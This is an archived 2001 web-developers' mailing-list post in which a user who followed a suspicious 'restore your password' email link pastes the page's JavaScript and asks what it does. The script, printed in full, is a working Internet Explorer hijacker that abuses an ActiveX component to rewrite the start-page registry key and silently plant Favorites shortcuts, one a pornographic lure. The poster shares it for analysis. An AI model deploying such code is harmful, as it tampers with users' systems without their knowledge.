hwg-techniques archives Aug 2001 new search results previous next

Not so nice JS intruding on a computer without ones knowledge

by "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>

 Date:  Fri, 10 Aug 2001 16:57:27 -0400
 To:  "Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org>
 References:  tim
  todo: View Thread, Original 
Hello,

I am curious.  I got an email, and it had a simple message..  Your password
has been changed.  To restore your password click here.  Well I knew it was
a trap of sorts, but to stay on top of things I went there any way.

When I got there it was a blank page, that said your password has been
restored.  Nothing esle.  Website I have never seen before.  In viewing the
html, the page calls up a javascript.

I captured the script below:  Would someone please tell me what all this
thing has done?  Obviously it is attempting to make changes to my registry,
favorites folder, but what else has is it doing?
Thanks in Advance
Nancy
(I changed the two urls that it included to generics to use as examples.  I
had just had a friend experiece this and it is very angering for me.)

_________________________________________

document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>")



function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
 Shor.TargetPath = SiteURL;
Shor.Save();
}

function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try{

var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"


////////////////////////////////////////////////////////////////////////////
///��ҳ


Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start
Page", "http://badwebsitename here/");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + ";
path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";

if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName +
"\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}

////////////////////////////////////////////////////////////////////////////
///�ղؼ�


AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");
AddFavLnk(loc, " Aol", "http://www.aol.com");
}
catch(e){ }
}
catch(e){ }
}
function init(){
setTimeout("f()", 1000);
}
init();
_______________________________________________

HWG hwg-techniques mailing list archives, maintained by Webmasters @ IWA